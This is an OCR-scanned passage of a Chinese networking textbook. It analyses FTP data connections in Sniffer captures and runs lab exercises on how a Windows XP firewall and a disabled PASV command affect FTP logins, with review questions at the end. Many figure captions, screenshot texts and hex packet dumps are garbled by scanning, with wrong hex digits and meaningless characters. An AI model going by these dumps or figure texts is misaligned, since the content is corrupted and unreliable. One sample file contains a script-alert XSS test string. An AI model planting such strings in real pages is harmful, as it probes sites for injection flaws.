0000030: fa £0 72 05 00 00 01 01 08 0a 00 15 e4 77 00 00 x 3 
0090049: 36 a 77 2 27 
0000050: 20 75 23 $5 72 20 20 20 20 20 67 72 6 75 70 20 user 

0000060: 20 20 20 20 20 20 20 20 20 33 31 20 4f 63 74 3 0 


0000070: 20 37 20 30 38 3a 33 39 20 31 2e 68 74 6d 6c 如 7 08:39 1.htnl 
0000080: 0a 2d 72 77 2d 72 77 2d 72 77 2d 20 20 20 31 20 -rw-rv-rv— 


group 
00000a0: 20 20 20 20 20 32 36 36 32 34 20 4e 6f 76 20 32 26624 Nov 2 
00000b0: 39 20 30 35 3a 34 31 20 e5 ae 9e e9 aa 8c 38 20 9 05:41 洽 议 狐 8 
00000c0: 46 54 50 e6 9c 8d e5 8a al e5 99 a8 e7 9a 84 e6 FTP 重复 妨 族 | 将 1 
00000d0: 90 ad e5 bb ba e5 8f 8a 46 54 50 e5 8d 8f e8 ae 本 
ae e5 88 86 e6 9e 90 6f 63 0d Oa 培 策 ?d 


图 11-14 第 一 条 数据 连接 


编号 31 一 34 的 数据 包 是 客户 与 服务 器 通过 四 次 挥手 机 制 中 断 这 条 数据 连接 。 这 条 
数据 连接 完成 目录 浏览 任务 。 

图 11-15 是 第 二 条 数据 连接 。 编 号 45、46、47 的 数据 包 是 三 次 握手 建立 连接 。 客 户 
端口 为 1152 ,服务 器 端口 为 4451( 在 此 之 前 服务 器 已 将 这 个 端口 通知 给 客户 )。 编 号 48 
的 报 文 是 客户 发 出 的 STOR 命令 ,请 求 将 hello. txt 上 传 到 FTP 服务 器 。 


2.17.99) 
VIN=65535 
e4833693 TEN"0 WINe64240 


12379 IN264974 


=1150 ACK， 
D-1162 S4451 ErN ACK-1085880119 Se:3304933694 LEN-0 WIN-642 所 
EY | 


3c 02 6d 40 00 40 06 bé £7 c0 a8 00 05 c0 ag .< 
02 04 80 11 63 be 9a £9 3e ed 83 bc 9e 80 18 
ff Sb 50 00 00 ol 01 08 Oa 00 00 cé Sf 00 00 
00 63 6f 6d 70 75 74 65 72 


图 11-15 第 二 条 数据 连接 


编号 50 的 数据 包 是 客户 通过 数据 连接 将 hello. txt 的 文件 内 容 发 送 给 服务 器 。 
图 11-15 下 部 给 出 的 就 是 编号 50 的 数据 包 内 容 , 可 见 在 应 用 层 数据 中 携带 的 就 是 hello. 
txt 的 内 容 , 即 字符 串 “computer”。 编 号 51 一 54 的 4 个 数据 包 是 四 次 挥手 报 文 。 这 条 数 
据 连 接 完成 上 传 hello. txt 文件 的 任务 。 

图 11-16 是 第 三 条 数据 连接 。 编 号 75、76、77 的 数据 包 是 三 次 握手 建立 连接 。 客 户 
端口 为 1153 ,服务 器 端口 为 4453( 在 此 之 前 服务 器 已 将 这 个 端口 通知 给 客户 )。 第 78 个 
报 文 是 客户 向 服务 器 发 送 了 一 条 SIZE 指令 ,查询 1. html 文件 的 大 小 。 第 79 个 报 文 是 服 
务 器 返回 的 响应 ,通知 客户 该 文件 大 小 为 31 字 节 。 第 80 个 报 文 是 客户 向 服务 器 发 出 了 
一 条 RETR 指令 ,请求 下 载 1. html。 服 务 器 返回 150 响应 ,代表 文件 传送 过 程 即将 开始 。 

第 82 个 数据 报 是 服务 器 通过 数据 连接 将 1. html 文件 的 内 容 传 送 给 客户 ,从 图 11-16 
可 见 ,该 文件 的 内 容 为 “一 script 盖 alert("Test"); 玫 /script 盖 ”, 共 31 字 节 。 第 83 一 86 的 
数据 报 是 四 次 挥手 中 断 连接 报 文 。 这 条 数据 连接 完成 文件 下 载 任务 。 
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17.101 


WIN=64240 


c6 9 5 72 74 28 七 Cscriptyalert( 
台 54 65 73 74 22 29 3b 3c 2f 73 63 72 69 70 74 "Test");¢/script 
0 》 


图 11-16 第 三 条 数据 连接 


116 测试 防火 墙 对 FTP 数据 通信 的 影响 


为 了 保护 FTP 服务 器 的 安全 ,通常 在 FTP 服务 器 上 会 运行 防火 墙 软件 ,防火 墙 会 对 
FTP 的 数据 通信 产生 影响 ,下 面 结 合 具体 训练 进行 分 析 。 


11.6.1 开启 FIP 服 务 器 端的 防火 墙 并 允许 21 端 口 .测试 FIP 
数据 通信 


训练 : 启动 Windows XP 虚拟 机 的 防火 墙 ,允许 FTP 的 21 号 端口 ,测试 FTP 通信 
还 能 否 进行 ,分 析 原 因 。 

第 一 步 : 以 host-only 方式 启动 Windows XP 虚拟 机 ,配置 IP 地 址 ,测试 通信 情况 。 

以 host-only 方式 启动 Windows XP 虚拟 机 ,配置 IP 地 址 为 192. 168. 0.2,Windows 
XP 虚拟 机 作为 FTP 服务 器 。 本 机 的 IP 地 址 为 192. 168. 0. 5, 本 机 作为 客户 端 。 使 用 
ping 命令 测试 本 机 和 Windows XP 虚拟 机 之 间 的 通信 情况 。 

第 二 步 : 在 Windows XP 虚拟 机 上 安装 FTP 服务 器 软件 Serv-U ,在 FTP 服务 器 端 
创建 一 个 用 户 peter( 步 骤 略 ) 。 

第 三 步 : 开启 Windows XP 虚拟 机 上 的 防火 墙 ,允许 21 端口 。 

右 击 Windows XP 虚拟 机 * 本 地 连接 ”一 选择 “属性 ”一 “高 级 ”> 设置 ”一 选择 “启用 
防火 墙 ” 一 选择 “例外 ”一 单 击 “添加 端口 ”, 弹 出 界面 如 图 11-17 所 示 ,名 称 输入 FTP ,端口 


使 用 这 些 设置 打开 通过 Windows 防火 墙 的 端口 以 使 用 。 要 查找 端口 号 
和 协议 ,请 查阅 您 要 使 用 的 程序 或 服务 的 文档 。 


更 改 范围 C)... 


图 11-17 添加 端口 
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输入 21, 单 击 “ 确 定 ” 按 钮 ,直至 完成 。 防 火 墙 设置 成 功 之 后 ,在 本 地 连接 右上 角 会 出 现 一 
个 金黄 色 的 小 锁 头 ,如 图 11-18 所 示 。 


文件 到 ) ”编辑 到 ) 查看 上) 收藏 和 工具 C) 高 级 如 ”帮助 如 


三 -人 -人 访 甩 时 辽 好 | 国 - 


地 址 ) | 售 网 络 连接 


国 凶 建 一 个 新 的 连接 
全 光世 4 开 人 


更 改 Windows 防火 
> 墙 设置 


图 11-18 防火 墙 设 置 成 功 


第 四 步 : 在 本 机 登录 FTP 服务 器 ,观察 能 否 登录 。 使 用 Sniffer 捕获 通信 数据 ,分 析 
原因 。 

在 本 机 启动 Sniffer 开始 捕获 ,然后 使 用 peter 用 户 登录 FTP 服务 器 ,一段 时 间 之 后 ， 
本 机 弹出 如 图 11-19 所 示 登 录 失 败 窗 体 。 


FTP 文件 夫 错 误 


打开 FIP 服务 器 上 的 文件 夹 时 发 生 错 误 。 请 检查 是 否 有 权限 访问 该 文件 夹 。 
详细 信息 : 


The operation timed out 


图 11-19 登录 失败 


停止 Sniffer 捕获 ,查看 数据 、 分 析 登 录 失 败 原因 。 如 图 11-20 所 示 ,第 1 一 3 个 数据 
包 是 客户 主动 与 服务 器 的 21 端口 建立 连接 ,由 于 FTP 服务 器 端的 防火 墙 允许 TCP21 端 
口 的 通信 ,因此 控制 连接 成 功 建立 。 第 4 一 7 和 第 10 一 22 个 数据 包 是 在 控制 连接 上 传递 
的 报 文 ,完成 身份 验证 等 任务 。 


TEN=T WIN 


LEN=0 WIN=64240 


ps | [192.168 192 23 6 EN=0 WIN=65535| 
192.168 [192 168 We 9 Ss n 23 5 776 LEN=0 VUIN=65535| 
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第 23、25 、26 个 数据 包 是 客户 连续 三 次 主动 连接 服务 器 的 4909 端口 ,试图 建立 数据 
连接 ,但 由 于 FTP 服务 器 端的 防火 墙 拦截 了 这 三 个 请 求 报 文 ,因此 数据 连接 没有 建立 成 
功 , 进 而 导致 FTP 登录 失败 。 


11.62 禁用 FIP 服 务 器 的 PASV 功能 ,测试 FIP 通 信 能 否 进行 


训练 : 禁用 FTP 服务 器 的 PASV 功能 ,测试 FTP 通信 和 能 否 进行 ,使 用 Sniffer 捕获 
通信 数据 ,分 析 原 因 。 

第 一 步 : 在 11. 6. 1 节 实 验 的 基础 之 上 禁用 FTP 服务 器 的 PASYV 功能 。 

在 FTP 服务 器 控制 面板 主页 的 “限制 和 设置 ?功能 下 , 单 击 * 为 域 配置 高 级 FTP 命令 
设置 和 行为 ”, 如 图 11-21 所 示 。 


三 | . 包 陡 并 维护 应 用 到 域 的 限制 。 


“维护 域 设置 ， 反 攻击 ， 密 码 恢复 以 及 自 定义 标志 。 
"为 域 配置 高 级 FTP 命令 设置 和 行为 。 
， 创建 并 指定 SSL 和 SSH 证 书 以 及 配置 加 密 设置 。 


图 11-21 选择 命令 设置 和 行为 


右 击 PASYV 命令 ,选择 “禁用 命令 ”命令 ,如 图 11-22 所 示 。 


之 前 登录 时 


指定 码 数据 块 的 最 大 宇 节 数 。 
指定 服务 器 为 了 传输 数据 应 连接 的 IP 地 址 和 鳞 口 ， 


制定 安全 接连 的 数据 通道 所 采用 的 保护 级 别 。 


图 11-22 禁用 PASYV 命令 


第 二 步 : 在 本 机 登录 FTP 服务 器 ,观察 能 否 登录 。 使 用 Sniffer 捕获 通信 和 数据, 分析 
原因 。 

在 本 机 启动 Sniffer 开始 捕获 ,然后 使 用 peter 用 户 登 录 FTP 服务 器 ,登录 成 功 , 结 果 
如 图 11-23 所 示 。 


Bl ftp://192. 168. 0. 2/ 
文件 E) ”编辑 下 ) 查看 WW) 收藏 和 ) 工具 帮助 00 


Os - © -| Pa xnx | 加 : 
地 址 加 ) | 园 ftp://192.168.0.2/ 一 
下 日 上 日 上 日 加 


oN as 
ktmi} haol23. txt 。 hell txt hello.txt 站 FTF 服 
务 器 的 指 
入 Internet Explorer 


有 利文 档 
站 # 莘 冰 
晤 网 上 邻居 


图 11-23 登录 成 功 
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停止 Sniffer 捕获 ,查看 数据 ,结果 如 图 11-24 所 示 。 第 21 个 数据 包 是 客户 发 给 服务 
器 的 PASV 指令 ,请 求 采用 PASV 模式 建立 连接 。 由 于 服务 器 端 已 经 禁用 了 PASV 命 
令 , 因 此 服务 器 返回 502 响应 (第 22 个 报 文 ) ,代表 命令 没有 成 功 执行 。 之 后 客户 改 为 使 
用 PORT 模式 建立 数据 连接 ,第 25 个 数据 包 是 客户 使 用 PORT 命令 将 随机 端口 1171 通 
知 给 服务 器 ,之 后 第 29、30、31 个 报 文 是 客户 与 服务 器 通过 三 次 握手 机 制 建立 数据 连接 ， 
第 一 次 握手 报 文 由 服务 器 主动 发 出 ,因此 服务 器 端的 防火 墙 会 允许 其 通过 ,进而 数据 连接 
建立 成 功 。 


uninplenented) 


33 | C a 8 IEN=0 VIN=64240 


35 CP: D= 043512 IEN-0 WIN-65472 
| Cp: D- 2 51 
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图 11-24 捕获 的 通信 数据 


思考 题 
1. FTP 数据 连接 的 两 种 建立 方式 , 即 PORT 和 PASYV 方式 各 自 适合 应 用 在 哪些 网 


络 环境 ? 
2. 防火 墙 对 FTP 通信 会 产生 哪些 影响 ? 
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